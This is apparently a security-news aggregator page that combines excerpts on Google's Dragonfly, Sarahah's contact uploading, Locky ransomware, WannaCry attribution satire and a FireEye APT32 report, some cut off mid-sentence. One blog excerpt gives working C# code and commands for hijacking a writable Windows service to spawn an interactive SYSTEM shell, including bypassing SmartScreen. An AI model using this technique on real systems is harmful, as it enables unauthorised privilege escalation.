MadSc13ntist

Hackers 'mainlining' vulns into projects – report

Use of vulnerable open source components has doubled over the last year despite their role in the high profile Equifax mega-breach.…

Online ad industry moves away from once prolific ads that are now deemed insecure because of DOM-based XSS vulnerabilities.

A scientist who quit Google over its plan to build a censored search engine in China has told U.S. senators that some company employees may have “actively subverted” an internal privacy review of the system.

Jack Poulson resigned from Google in August after The Intercept reported that a group of the internet giant’s staffers was secretly working on a search engine for China that would remove content about subjects such as human rights, democracy, peaceful protest, and religion. “I view our intent to capitulate to censorship and surveillance demands in exchange for access to the Chinese market as a forfeiture of our values and governmental negotiating position across the globe,” Poulson told his bosses.

Now, Poulson has sent a letter to members of the Senate Committee on Commerce, Science, and Transportation ahead of a hearing on Wednesday at which Keith Enright, Google’s chief privacy officer, is scheduled to appear. Despite a major internal and external backlash over a period of almost two months, Google has so far refused to publicly address questions about its China censorship plan, code-named Dragonfly. The appearance of Enright on Capitol Hill is likely to be the first time a representative of the company is forced to provide answers about the project.

In his letter to the senators, Poulson said that there has been “a pattern of unethical and unaccountable decision making from company leadership” at Google. He called on the lawmakers to pressure Enright to respond to concerns raised by 14 leading human rights groups, who said in late August that Dragonfly could result in Google “directly contributing to, or [becoming] complicit in, human rights violations.”

Poulson also shared information about Dragonfly with the senators. He told the lawmakers that in the process of developing the Chinese search platform, there was “a catastrophic failure of the internal privacy review process, which one of the reviewers characterized as [having been] actively subverted.”

The “catastrophic failure” Poulson mentioned relates to an internal dispute between Google employees who work on privacy issues and engineers who developed the censored search system, sources said. The privacy reviewers approved aspects of the code for Dragonfly after they were told it did not involve user data. After The Intercept exposed the project in early August, the privacy reviewers took another look at the code and felt that their colleagues working on Dragonfly had seriously and purposely misled them. The system did involve user data and had been designed to link users’ search queries to a personal phone number, track users’ movements, IP addresses, and information about the devices they use and the links they clicked on.

Poulson told the senators that he could “directly verify” that a prototype of Dragonfly would allow a Chinese partner company to “search for a given user’s search queries based on their phone number.” He added that the censorship blacklist developed for the system contained the English term “human rights,” the Mandarin terms for “student protest” and “Nobel prize,” and “very large numbers of phrases involving ‘Xi Jinping’ and other members” of China’s ruling Communist Party regime.

Poulson said that the Dragonfly system contained code to “ensure only Chinese government-approved air quality data would be returned in response to Chinese users’ search.” The country’s authorities have a history of manipulating pollution data, raising the possibility that Google would provide Chinese citizens with false information to downplay the amount of toxins in the air.

“Dragonfly is part of a broad pattern of unaccountable decision-making across the tech industry,” Poulson told the senators. “It has been made clear, both by word and by action, that the leadership at Google will be clamping down on the types of internal investigation that were necessary to bring Project Dragonfly to light. I would hope that the committee would help protect the environment needed for future whistleblowers by taking steps to guarantee ethical transparency and oversight across Silicon Valley.”

“Dragonfly is part of a broad pattern of unaccountable decision-making.”

Poulson, who was previously an assistant professor at Stanford University’s department of mathematics, worked in Google’s research and machine intelligence division as a senior research scientist. He did not work on the China search engine, but one of his responsibilities involved “international query analysis,” improving Google’s search accuracy across a wide variety of languages, and his output could have been integrated into Dragonfly without his knowledge. He joined Google in May 2016 and worked out of the company’s Mountain View headquarters for a year before relocating to offices in Toronto.

Google launched a censored search engine in China in 2006, but stopped operating the service in 2010, citing concerns about Chinese government censorship and efforts to hack activists’ Gmail accounts. Google co-founder Sergey Brin said in 2010 that he saw “earmarks of totalitarianism” in China in relation to censorship and surveillance, which he said he found “personally quite troubling.”

Poulson told The Intercept in an interview earlier this month that he “very much agree[s] with the case Sergey made in 2010. That’s the company I joined, the one that was making that statement.” If Google was now reversing its anti-censorship position, he said, then he could no longer “be complicit as a shareholder and citizen of the company.”

Google did not respond to a request for comment on this story.

Top photo: Google’s display at the first China Smart Expo 2018 in Chongqing, China, on Aug. 23, 2018.

The post Former Google Scientist Tells Senate to Act Over Company’s “Unethical and Unaccountable” China Censorship Plan appeared first on The Intercept.

Facebook yesterday removed its mobile VPN app called Onavo Protect from the iOS App Store after Apple declared the app violated the iPhone maker's App Store guidelines on data collection. For those who are unaware, Onavo Protect is a Facebook-owned Virtual Private Network (VPN) app that was primarily designed to help users keep tabs on their mobile data usage and acquired by Facebook from an

Though the bug was present for over a year, Twitter hasn't found any DMs or protected tweets that were delivered to the wrong developer.

A former NSA employee has been sentenced to five and a half years in prison for illegally taking a copy of highly classified documents and hacking tools to his home computer between 2010 and 2015, which were later stolen by Russian hackers. Nghia Hoang Pho, 68, of Ellicott City, Maryland—who worked as a developer with Tailored Access Operations (TAO) hacking group at the NSA since April 2006—

Ben Buchanan is an assistant teaching professor at Georget

Cybercriminals, including state-sponsored hackers, have started actively exploiting a newly discovered Microsoft Office vulnerability that Microsoft does not consider as a security issue and has already denied to patch it. Last month, we reported how hackers could leverage a built-in feature of Microsoft Office feature, called Dynamic Data Exchange (DDE), to perform code execution on the

Ransomware has been one of the most prevalent, prolific, and pervasive threats in the 2017 threat landscape, with financial losses among enterprises and end users now likely to have reached billions of dollars. Locky ransomware, in particular, has come a long way since first emerging in early 2016. Despite the number of times it apparently spent in hiatus, Locky remains a relevant and credible threat given its impact on end users and especially businesses. Our detections show that it’s making another comeback with new campaigns.

A closer look at Locky’s activities reveals a constant: the use of spam. While spam remains to be a major entry point for ransomware, others such as Cerber also employ vectors like exploit kits. Locky, however, appears to concentrate its distribution through large-scale spam campaigns regardless of the variants released by its operators/developers.  Here’s a visualization of its distribution from January 2 to September 8:

Figure 1: A timeline of Locky ransomware detections based on partial feedback from our email-based sensors

The Necurs Connection
We’ve also found how the scale and scope of Locky’s distribution are fueled by the Necurs botnet, a spam distribution infrastructure comprising zombified devices. It churns out a sizeable amount of spam emails carrying information stealers like Gameover ZeuS, ZBOT or Dridex, and other ransomware families such as CryptoLocker, CryptoWall, and Jaff.

Necurs is Locky’s known and long-time partner in crime, and it’s no coincidence that the surge of Locky-bearing spam emails corresponds with the uptick in Necurs’ own activity. In fact, we saw that Necurs actively pushed Locky from August to October. Here’s a timeline:

Figure 2: Necurs botnet distributing Locky variants from August 29 to October 11, 2017

It’s also worth noting that Necurs also distributed Locky via URL-only spam emails—that is, the messages didn’t have any attachments, but rather links that divert users to compromised websites hosting the ransomware. The use of HTMLs embedded with links to the compromised site also started gaining traction this year.

Interestingly, we saw a sizeable URL-only spam campaign that delivered the Trickbot banking malware (TSPY_TRICKLOAD) separately. The routine is similar to another campaign we observed, where cybercriminal operators rotated their payloads between FakeGlobe and Locky. In some of our tests, we found that the payload depended on the region: western countries are more likely to be served with Trickbot, while countries like Japan and Taiwan, for instance, are more likely to get Locky.

Figure 3: A sample URL-only spam email that delivered either Trickbot or Locky

Spam attachments: Locky’s testing ground?
The timing of Locky’s lulls and surges matches other cybercriminal activities. They can also be construed as intervals used to fine-tune and diversify Locky’s infection chains. This is the likeliest case with the recent Diablo and Lukitus variants, which used malicious (or posed as) PDF and image files (i.e., JPEG, TIFF). They are deviations from the usual vectors, Word documents embedded with malicious macro code or Visual Basic scripts (VBS).

And indeed, we’ve seen Locky diversify in terms of the spam email attachments it uses. Necurs botnet, for instance, increasingly favors the distribution of spam emails with HTML files. The Locky spam campaign we monitored in mid-September also used Word documents with malicious macro, but coded to run and download Locky after the user closes the file. Locky also abused Windows Script File (WSF) and dynamic-link libraries (DLL) as infection vectors, so it’s not implausible for the ransomware to misuse other file types and expand beyond macros, VBSes, or HTML files. Here’s a breakdown of the file attachments used by Locky-laced spam emails we’ve seen so far:

Figure 4: The file types used by Locky-carrying spam emails in from January to September 2017; note that the VBS, JS, and JSE files are archived via RAR, ZIP or 7ZIP files

Locky’s common social engineering lures
Indeed, the continuous changes in Locky’s use of file attachments are its way of adjusting its tools to evade or bypass traditional security. But despite the seeming variety, there are common denominators in Locky’s social engineering, particularly in the email subjects and content. They appear to have the same old flavors, but with relatively different twists. Some of the recent lures we saw were:

• Fake voice message notifications (vishing, or the use of voice-related systems in phishing attacks)
• HTML attachments posing as invoices
• Archive files masquerading as business missives from multinationals, e.g., audit and budget reports
• Fraudulent emails that involve monetary transactions such as bills, parcel/delivery confirmations, and payment receipts

Mind your gaps
The delivery mechanism is a critical component for any ransomware. Locky’s infection vectors—and its adverse impact on affected systems—demonstrate the significance of a multilayered approach to safeguarding the privacy, security, and integrity of the gateways, endpoints, networks or servers that manage or store mission-critical, corporate or personal data. Follow and apply best practices against ransomware: keep the system patched, secure the email gateway, and regularly back up data. Enterprises should implement defense in depth: enforce the principle of least privilege, keep the system and its applications updated (or employ virtual patching), and incorporate additional layers of security against malicious files and network activities that can be exploited by ransomware. More importantly, foster a culture of cybersecurity—the technologies that thwart threats are only as effective as the people who use them.

Trend Micro Solutions
Trend Micro™ Hosted Email Security is a no-maintenance cloud solution that delivers continuously updated protection to stop threats like Locky before they reach the network. Email and web gateway solutions such as Trend Micro™ Deep Discovery™ Email Inspector and InterScan™ Web Security prevent ransomware from ever reaching end users. At the endpoint level, Trend Micro™ Smart Protection Suites, powered by XGen™ Security, deliver several capabilities like high-fidelity machine learning, behavior monitoring and application control, and vulnerability shielding that minimizes Locky’s impact.

Trend Micro™ Deep Security™ stops ransomware from reaching enterprise servers–whether physical, virtual or in the cloud. Trend Micro™ Worry-Free Services Advanced offers cloud-based email gateway security to small businesses through Hosted Email Security. Its endpoint protection also delivers several capabilities such as behavior monitoring and real-time web reputation in order detect and block ransomware. For home users, Trend Micro Security 10 provides strong protection against ransomware by blocking malicious websites, emails, and files associated with this threat.

Post from: Trendlabs Security Intelligence Blog - by Trend Micro

A Look at Locky Ransomware’s Recent Spam Activities

Your personal data was probably already in crims' hands

The United States Internal Revenue Service has said that citizens affected by the Equifax breach need not panic, because it probably didn't reveal anything that hasn't already been stolen and the agency has tooled up to deal with fraudulent tax claims.…

While most modern ships may not have physical leaks, they are catastrophically porous when it comes to cyber security.

It is good to be paranoid when it comes to cybersecurity. Google already provides various advanced features such as login alerts and two-factor authentication to keep your Google account secure. However, if you are extra paranoid, Google has just introduced its strongest ever security feature, called "Advanced Protection," which makes it easier for users, who are usually at high risk of

You don't need to know how to write a single line of code to write Android ransomware.

A friend had a problem: he found a Windows service with a writable executable (e.g. writable by a non-admin user), replaced it with a copy of cmd.exe, but got no prompt.

This is because of 2 reasons.

First, a Windows service is a Windows executable (PE file) that must be able to interact with the Services Control Manager when the SCM loads the executable. Since cmd.exe does not have the capability to interact with the SCM, the SCM will quickly stop the cmd.exe executable. On my Windows VM, cmd.exe ran only 200 milliseconds when launched by the SCM.

Here you can see how the SCM reacts when it launches cmd.exe:

This problem can be solved by creating a Windows service executable that launches cmd.exe upon starting. Creating such a Windows service with .NET is easy, here is the minimum C# source code for a service that launches cmd.exe upon starting:

using System.ServiceProcess;

namespace Demo
{
    public class Service : ServiceBase
    {
        protected override void OnStart(string[] args)
        {
            System.Diagnostics.Process.Start("cmd.exe");
        }
    }

    static class Program { static void Main() { ServiceBase.Run(new ServiceBase[] { new Service() }); } }
}

cmd.exe will be running, but we will still not have a console window. This is because of the second reason: Windows services run in session 0 and session 0 does not allow user interfaces. So cmd.exe runs in session 0 and my friend’s user account runs in session 1. If we can make cmd.exe run in session 1, then my friend can interact with the console.

There is a quick solution for this: psexec. With psexec’s option -i, one can specify in which session the program launched by psexec must run.
So our minimal code for a service becomes:

using System.ServiceProcess;

namespace Demo
{
    public class Service : ServiceBase
    {
        protected override void OnStart(string[] args)
        {
            System.Diagnostics.Process.Start(@"c:\demo\psexec.exe", @"-accepteula -d -i 1 cmd.exe");
        }
    }

    static class Program { static void Main() { ServiceBase.Run(new ServiceBase[] { new Service() }); } }
}

This simple service can be compiled with the C# compiler csc.exe:

In this example, I install the service with command “sc create Service type= own binpath= c:\demo\Service.exe”, but of course, my friend did not have to do this (this requires admin rights), he just had to replace the service’s executable:

When I first tried this, it did not work. Looking through procmon‘s logs for service.exe, I saw that the psexec executable was never loaded. At the end of the logs, I saw references to smartscreen.exe, and then quickly thereafter, service.exe stopped running. That’s when it dawned on me: when I downloaded psexec, I left the mark-of-web on the file. SmartScreen did now allow psexec to run because it was downloaded from the Internet. After removing that mark, it all ran without problem.

 

Sarahah, a new app that lets people sign up to receive anonymized, candid messages, has been surging in popularity; somewhere north of 18 million people are estimated to have downloaded it from Apple and Google’s online stores, making it the No. 3 most downloaded free software title for iPhones and iPads.

Sarahah bills itself as a way to “receive honest feedback” from friends and employees. But the app is collecting more than just feedback messages. When launched for the first time, it immediately harvests and uploads all phone numbers and email addresses in your address book. Although Sarahah does in some cases ask for permission to access contacts, it does not disclose that it uploads such data, nor does it seem to make any functional use of the information.

Zachary Julian, a senior security analyst at Bishop Fox, discovered Sarahah’s uploading of private information when he installed the app on his Android phone, a Galaxy S5 running Android 5.1.1. The phone was outfitted with monitoring software, known as Burp Suite, which intercepts internet traffic entering and leaving the device, allowing the owner to see what data is sent to remote servers. When Julian launched Sarahah on the device, Burp Suite caught the app in the act of uploading his private data.

“As soon as you log into the application, it transmits all of your email and phone contacts stored on the Android operating system,” he said. He later verified the same occurs on Apple’s iOS, albeit after a prompt to “access contacts,” which also appears in newer versions of Android. Julian also noticed that if you haven’t used the application in a while, it’ll share all of your contacts again. He did some testing of the app on a Friday night, and when he booted the app on a Sunday morning, it pushed all of his contacts again. (You can see some of his testing in this video.)

Sarahah did not initially respond to requests for comment. After this piece was published, the app’s creator, Zain al-Abidin Tawfiq, tweeted that the contacts functionality would be removed in a future release and had been intended for a “‘find your friends’ feature.” He later told The Intercept the feature was stymied by “technical issues” and that a partner, who he has since stopped working with, was supposed to remove it from the app but “missed that.” He claims the functionality was, however, removed from the server and that Sarahah stores no contacts in its databases. This is impossible to verify.

Drew Porter, founder of security firm Red Mesa, said that this type of behavior is more common than most users would expect, especially when apps, like Sarahah, are free. He said that even if users are willing to trust a piece of software with their address book data, there are reasons to avoid trusting the internet servers associated with the app. “It’s no longer that you have to worry about the data on your phone, it’s that you have to worry about the data on your phone that’s somewhere else that you have no control over being compromised,” he said. “It’s not just, ‘Oh, this company can see my information and I’m OK with that.’ You now have to think about the security of that company.”

When asked about Sarahah, Porter added, “I do find it concerning, mostly because the information that the company may be getting could be what other people consider very private, and you don’t know the security of the company that is getting it. We’ve seen popular apps before, total information leakage comes out, and it’s devastating to those companies. I believe it’s even more devastating to the user whose information was compromised.”

Will Strafach, president of Sudo Security Group Inc., pointed out that security researchers and app reviewers can only see what is happening on the device itself, rather than server side, making it impossible for anyone but the developer to know if the data is being stored or just used, and if stored, how well it is protected. “Even in an innocent use case, if the data is not being handled safely, a server breach could allow malicious parties access to this contacts data,” he said. “Additionally, there is no silver bullet to solving this. My team wrote software to automatically detect this behavior in iOS apps in order to call out bad actors, but we found that the information was not as useful as anticipated, because so many apps are doing it, and there is no reliable way to tell if the data is being handled safely on the server’s side, and that is the most important part.”

But Julian thinks that Sarahah uploading contacts is disconcerting, especially given the app’s popularity, and especially since most users don’t expect it to occur. On iOS, the app says, “The app needs to access your contacts to show you who has an account in Sarahah,” and allows the user to choose between “OK” and “Don’t Allow.” On Android, the app in some cases requests access to contacts without giving any reason for needing such access, and in other cases makes no such request. On neither operating system does it mention uploading data to a server. “The privacy policy specifically states that if it plans to use your data, it’ll ask for your consent,” Julian said. While the app’s entry in Google’s Play Store does indicate the app will access contacts, that’s not “enough consent” to justify “sending all of those contacts over without any kind of specific notification,” he added.

Despite claiming on iOS to use contact data to show the user who in their address book is on Sarahah, the app does not actually do so, Julian said, judging from his testing. If Sarahah did ever begin showing which of your contacts are on its network, as advertised, this would lead to a new problem: It would make it far easier to deduce who is sending messages. For now, it’s not clear how the data is being used.

“Sarahah has between 10 and 50 million installs on just the Play Store alone for Android, so if you extrapolate that number, it could easily get into hundreds of millions of phone numbers and email addresses that they’ve harvested,” Julian said. Sarahah is among the top five most downloaded apps in Google’s Play Store for Android, according to analytics firm App Annie.

It’s not entirely clear what Sarahah uses uploaded contact lists for, although the app’s privacy policy states that it will not sell the information to third parties without prior and written consent, unless it’s part of bulk data used for statistics and research.

Newer Android operating systems, starting with Android 6.0 (“Marshmallow”) do allow for more granular permissions for apps, allowing users to modify controls so that apps do not gain access to contacts or other information. However, all but the most expensive Android phones are notoriously slow to receive updates like Marshmallow, and around 54 percent of Android users are using older versions that don’t have these permissions, and users have to be savvy enough to know where to find the app permissions (Settings > Apps > Gear button > App permissions).

Other apps that send users’ contacts to external servers are more forthright in their privacy policies. For example, the so-called ephemeral messaging app, Snapchat, which settled FTC charges in 2014 that its promises of disappearing messages were false, and which also transmitted user location and collected user address books without notice or consent, now has a robust privacy policy which states that the app “may — with your consent — collect information from your device’s phonebook,” and that if you allow this, and you’re in another user’s contacts, that it may combine information collected from their phone book with what they have collected about you. The prompt to add contacts states: “Find your friends. See which of your contacts are on Snapchat!” and the popup on iOS clearly says that the contacts will be uploaded to Snapchat’s servers “so you and others can find friends, and to improve your experience.”

Sarahah appears to be a much smaller operation than Snapchat. It was created in Saudi Arabia by Tawfiq, according to news accounts. It is just the latest in a series of apps pairing promises of anonymity with troubling privacy practices. Another was Secret, now defunct, which was supposed to traffic in anonymized messages from friends and mutual friends. In 2014, security researchers were able to decloak posters on the app by tricking the app’s contact-matching system.

A silver lining for Sarahah users concerned about privacy is that they don’t need to download the service’s app. It’s possible to send messages on Sarahah and register to receive messages on Sarahah, via a website. And that site doesn’t ask for or access contacts from any of your digital address books.

Still, if Sarahah intends to continue scooping up user’s contact data via mobile apps, Julian believes a more responsible path for the company would be to specifically inform the user about what data they are giving up and where it is going — and to provide them with a legitimate reason as to why the app actually needs it.

Top photo: A photo of Sarahah, a new app that lets people anonymously critique one another.

Update: Aug. 27, 2017, 1:35 p.m.

This piece was updated to include a new estimate of Android Sarahah installs from Julian.

Update: Aug. 27, 2017, 9:45 p.m.

This piece was updated to include a response from the creator of Sarahah.

The post Hit App Sarahah Quietly Uploads Your Address Book appeared first on The Intercept.

The Game:

I figured since everyone else is playing the ATTRIBUTION GAMES over Wannacrypt0r that I would get in on the action and give it my own personal spin. The big difference here is that I am not selling any of you anything so if you read this post it is all about not buying my shiny new machine learning, next gen machine that goes PING! Nope, I just thought I would put a few words down to stop the insanity so to speak that I already see in the eyes of those $VENDOR’s out there about to hit SEND on their latest salvo of shenanigans concerning the Wannacry event of last week.

That’s right, I am already calling shenanigans!

Right so this game here is a red team on the idea that Wannacry was either an APT Nation State actor (either LAZ or SHADOW) or a criminal gang who will be represented by Ernst Stavro Blofeld. Once this is all said and done I hope that some sanity will ensue and more to the point, some elaborate death will be planned out, set into motion, and then foiled by James Bond…

Wait… what?

Let’s begin… DOMINATION OF THE WORLD….. Let’s just list the indicators and possible motivations all kinds of bulletized shall we?

THE LAZARUS GROUP (UNIT 180):

• LAZARUS code snippets found in WANNACRY samples
• LAZARUS has been active in stealing large sums of money from banks, as this attack was about ransom and money… well… UNDERPANTS GNOMES AND PROFIT!
• LAZARUS aka Un, would likely love to sow terror by unleashing the digital hounds with malware attacks like this to prove a point, that they are out there and to be afraid.
• LAZARUS aka Un, might have done this not only to sow fear but also to say to President CRAZYPANTS (Official USSS code name btw) “FEAR US AND OUR CYBER PROWESS“
• LAZARUS aka Un, is poor and needs funds so ransoming hospitals and in the end gathering about $100k is so gonna fill the coffers!
• LAZARUS aka UNIT 180 players are “Freelancing” and using TTP’s from work to make MO’ MONEY MO’ MONEY MO’ MONEY (No! Someone actually really floated that idea!)
• LAZARUS is a top flight spooky as shit hacking group that needed to STEAL code from RiskSense (lookit that IPC$ from the pcap yo) to make their shit work.. Huh?

SHADOWBROKERS (GRU):

• SHADOWBROKERS made no money on their auction and posted a long pissy diatribe about it after the incident reached critical media frenzy
• SHADOWBROKERS had the code already and then needed to CRIB some of the ETERNALBLUE/FUZZBUNCH NSA code ganked from RiskSense because they lack the ability to make the shit work themselves… Which they then re-coded in C…  Huh?
• SHADOWBROKERS want to just sow mayhem with WANNACRY and continue the massive schadenfreude that the NSA is feeling from their theft (*cough MOLE HUNT cough*) but once again, they had to STEAL that code snippet to make it work… Or, is that just another poke at the US? A diversion? A red herring so to speak? Hmmmm….
• SHADOWBROKERS re-used or re-purposed old malware WANNACRYPT0R and threw in some code snippets from LAZARUS GROUP TTP’s to muddy the waters and have EVERYONE pointing their collective fingers at the Hermit Nation because WHY THE FUCK NOT HUH!? This would sow more FUD and gee, isn’t that the playbook chapter like 3 in ACTIVE MEASURES komrade?

ERNST STAVRO BLOFELD:

• ERNST has a well known volcano lair and upkeep is rather steep in this global market so ransomware is the way to go baby!
• ERNST is a Devil may care kind of guy and wants to sprinkle clues for both RUSSIAN and DPRK actors here to cause all kinds of mayhem while he sits and strokes his cat while the bitcoins amass.
• ERNST is a gangster and his coders, well, sometimes they suck so they stole the ETERNALBLUE snippets but then they couldn’t make that work UNTIL they coded it all in C so.. yeah..
• ERNST is a nihilist at heart so he just slapped this shit together and then made sure that there was a killswitch in there as a safety valve, I mean, look at how many times he tried to kill Bond but always missed by that much!

Well there you have it. I have gamed it all out for you. Who do you think dunnit? If you look at all of these players and their motivations along with the superior threat intel evidence we have out there that the attribution firms are selling…

OBVIOUSLY IT’S ALL OF THEM! THEY ARE WORKING TOGETHER PEOPLE! IT’S THE NEW SPECTRE! CAN’T YOU ALL SEE THAT WITH THE PLETHORA OF EVIDENCE WE HAVE! COME ON!

*breathe…..**

Ok ok ok… See what I did there? I am making a point with humor.

IT DOESN’T FUCKING MATTER WHO DID IT!

PATCH YOUR SHIT.

DO THE THINGS.

STOP.

Dr. K.

WikiLeaks has published a new batch of the ongoing Vault 7 leak, detailing a spyware framework – which "provides remote beacon and loader capabilities on target computers" – allegedly being used by the CIA that works against every version of Microsoft's Windows operating systems, from Windows XP to Windows 10. Dubbed Athena/Hera, the spyware has been designed to take full control over the

An anonymous reader writes: The Necurs botnet has been harnessed to fling a new strain of ransomware dubbed "Jaff". Jaff spreads in a similar way to the infamous file-encrypting malware Locky and even uses the same payment site template, but is nonetheless a different monster. Attached to dangerous emails is an infectious PDF containing an embedded DOCM file with a malicious macro script. This script will then download and execute the Jaff ransomware. Locky -- like Jaff -- also used the Necurs botnet and a booby-trapped PDF, security firm Malwarebytes notes. "This is where the comparison ends, since the code base is different as well as the ransom itself," said Jerome Segura, a security researcher at Malwarebytes. "Jaff asks for an astounding 2 BTC, which is about $3,700 at the time of writing." Proofpoint reckons Jaff may be the work of the same cybercriminals behind Locky, Dridex and Bart (other nasty malware) but this remains unconfirmed. And Forcepoint Security Labs reports that malicious emails carrying Jaff are being cranked out at a rate of 5 million an hour on Thursday, or 13 million in total at the time it wrote up a blog post about the new threat.

Read more of this story at Slashdot.

An anonymous reader writes: The audio driver installed on some HP laptops includes a feature that could best be described as a keylogger, which records all the user's keystrokes and saves the information to a local file, accessible to anyone or any third-party software or malware that knows where to look. Swiss cyber-security firm modzero discovered the keylogger on April 28 and made its findings public today. According to researchers, the keylogger feature was discovered in the Conexant HD Audio Driver Package version 1.0.0.46 and earlier. This is an audio driver that is preinstalled on HP laptops. One of the files of this audio driver is MicTray64.exe (C:\windows\system32\mictray64.exe). This file is registered to start via a Scheduled Task every time the user logs into his computer. According to modzero researchers, the file "monitors all keystrokes made by the user to capture and react to functions such as microphone mute/unmute keys/hotkeys."

Read more of this story at Slashdot.

When the world was dealing with the threat of the self-spreading WannaCry ransomware, WikiLeaks released a new batch of CIA Vault 7 leaks, detailing two apparent CIA malware frameworks for the Microsoft Windows platform. Dubbed "AfterMidnight" and "Assassin," both malware programs are designed to monitor and report back actions on the infected remote host computer running the Windows

Cyber espionage actors, now designated by FireEye as APT32 (OceanLotus Group), are carrying out intrusions into private sector companies across multiple industries and have also targeted foreign governments, dissidents, and journalists. FireEye assesses that APT32 leverages a unique suite of fully-featured malware, in conjunction with commercially-available tools, to conduct targeted operations that are aligned with Vietnamese state interests.

APT32 and FireEye’s Community Response

In the course of investigations into intrusions at several corporations with business interests in Vietnam, FireEye’s Mandiant incident response consultants uncovered activity and attacker-controlled infrastructure indicative of a significant intrusion campaign. In March 2017, in response to active targeting of FireEye clients, the team launched a Community Protection Event (CPE) – a coordinated effort between Mandiant incident responders, FireEye as a Service (FaaS), FireEye iSight Intelligence, and FireEye product engineering – to protect all clients from APT32 activity.

In the following weeks, FireEye released threat intelligence products and updated malware profiles to customers while developing new detection techniques for APT32’s tools and phishing lures. This focused intelligence and detection effort led to new external victim identifications as well as providing sufficient technical evidence to link twelve prior intrusions, consolidating four previously unrelated clusters of threat actor activity into FireEye’s newest named advanced persistent threat group: APT32.

APT32 Targeting of Private Sector Company Operations in Southeast Asia

Since at least 2014, FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam’s manufacturing, consumer products, and hospitality sectors. Furthermore, there are indications that APT32 actors are targeting peripheral network security and technology infrastructure corporations.

Here is an overview of intrusions investigated by FireEye that are attributed to APT32:

• In 2014, a European corporation was compromised prior to constructing a manufacturing facility in Vietnam.
• In 2016, Vietnamese and foreign-owned corporations working in network security, technology infrastructure, banking, and media industries were targeted. 
• In mid-2016, malware that FireEye believes to be unique to APT32 was detected on the networks of a global hospitality industry developer with plans to expand operations into Vietnam.
• From 2016 through 2017, two subsidiaries of U.S. and Philippine consumer products corporations, located inside Vietnam, were the target of APT32 intrusion operations.

Table 1 shows a breakdown of APT32 activity, including the malware families used in each.

Year	Country	Industry	Malware
2014	Vietnam	Network Security	WINDSHIELD
2014	Germany	Manufacturing	WINDSHIELD
2015	Vietnam	Media	WINDSHIELD
2016	Philippines	Consumer products	KOMPROGO WINDSHIELD SOUNDBITE BEACON
2016	Vietnam	Banking	WINDSHIELD
2016	Philippines	Technology Infrastructure	WINDSHIELD
2016	China	Hospitality	WINDSHIELD
2016	Vietnam	Media	WINDSHIELD
2016	United States	Consumer Products	WINDSHIELD PHOREAL BEACON SOUNDBITE

Table 1: APT32 Private Sector Targeting Identified by FireEye

APT32 Interest in Political Influence and Foreign Governments

In addition to focused targeting of the private sector with ties to Vietnam, APT32 has also targeted foreign governments, as well as Vietnamese dissidents and journalists since at least 2013. Here is an overview of this activity:

• A public blog published by the Electronic Frontier Foundation indicated that journalists, activists, dissidents, and bloggers were targeted in 2013 by malware and tactics consistent with APT32 operations.
• In 2014, APT32 leveraged a spear-phishing attachment titled “Plans to crackdown on protesters at the Embassy of Vietnam.exe," which targeted dissident activity among the Vietnamese diaspora in Southeast Asia. Also in 2014, APT32 carried out an intrusion against a Western country’s national legislature.
• In 2015, SkyEye Labs, the security research division of the Chinese firm Qihoo 360, released a report detailing threat actors that were targeting Chinese public and private entities including government agencies, research institutes, maritime agencies, sea construction, and shipping enterprises. The information included in the report indicated that the perpetrators used the same malware, overlapping infrastructure, and similar targets as APT32.
• In 2015 and 2016, two Vietnamese media outlets were targeted with malware that FireEye assesses to be unique to APT32.
• In 2017, social engineering content in lures used by the actor provided evidence that they were likely used to target members of the Vietnam diaspora in Australia as well as government employees in the Philippines.

APT32 Tactics

In their current campaign, APT32 has leveraged ActiveMime files that employ social engineering methods to entice the victim into enabling macros. Upon execution, the initialized file downloads multiple malicious payloads from remote servers. APT32 actors continue to deliver the malicious attachments via spear-phishing emails.

APT32 actors designed multilingual lure documents which were tailored to specific victims. Although the files had “.doc” file extensions, the recovered phishing lures were ActiveMime “.mht” web page archives that contained text and images. These files were likely created by exporting Word documents into single file web pages.

Table 2 contains a sample of recovered APT32 multilingual lure files.

ActiveMime Lure Files	MD5
2017年员工工资性津贴额统计报告.doc (2017 Statistical Report on Staff Salary and Allowances)	5458a2e4d784abb1a1127263bd5006b5
Thong tin.doc (Information)	ce50e544430e7265a45fab5a1f31e529
Phan Vu Tutn CV.doc	4f761095ca51bfbbf4496a4964e41d4f
Ke hoach cuu tro nam 2017.doc (2017 Bailout Plan)	e9abe54162ba4572c770ab043f576784
Instructions to GSIS.doc	fba089444c769700e47c6b44c362f96b
Hoi thao truyen thong doc lap.doc (Traditional Games)	f6ee4b72d6d42d0c7be9172be2b817c1
Giấy yêu cầu bồi thường mới 2016 - hằng.doc (New 2016 Claim Form)	aa1f85de3e4d33f31b4f78968b29f175
Hoa don chi tiet tien no.doc (Debt Details)	5180a8d9325a417f2d8066f9226a5154
Thu moi tham du Hoi luan.doc (Collection of Participants)	f6ee4b72d6d42d0c7be9172be2b817c1
Danh sach nhan vien vi pham ky luat.doc (List of Employee Violations)	6baafffa7bf960dec821b627f9653e44
Nội-dung-quảng-cáo.doc (Internal Content Advertising)	471a2e7341f2614b715dc89e803ffcac
HĐ DVPM-VTC 31.03.17.doc	f1af6bb36cdf3cff768faee7919f0733

Table 2: Sampling of APT32 Lure Files

The Base64 encoded ActiveMime data also contained an OLE file with malicious macros. When opened, many lure files displayed fake error messages in an attempt to trick users into launching the malicious macros. Figure 1 shows a fake Gmail-theme paired with a hexadecimal error code that encourages the recipient to enable content to resolve the error. Figure 2 displays another APT32 lure that used a convincing image of a fake Windows error message instructing the recipient to enable content to properly display document font characters.

Figure 1: Example APT32 Phishing Lure – Fake Gmail Error Message

Figure 2: Example APT32 Phishing Lure – Fake Text Encoding Error Message

APT32 operators implemented several novel techniques to track the efficacy of their phishing, monitor the distribution of their malicious documents, and establish persistence mechanisms to dynamically update backdoors injected into memory.

In order to track who opened the phishing emails, viewed the links, and downloaded the attachments in real-time, APT32 used cloud-based email analytics software designed for sales organizations. In some instances, APT32 abandoned direct email attachments altogether and relied exclusively on this tracking technique with links to their ActiveMime lures hosted externally on legitimate cloud storage services.

To enhance visibility into the further distribution of their phishing lures, APT32 utilized the native web page functionality of their ActiveMime documents to link to external images hosted on APT32 monitored infrastructure.

Figure 3 contains an example phishing lure with HTML image tags used for additional tracking by APT32.

Figure 3: Phishing Lure Containing HTML Image Tags for Additional Tracking

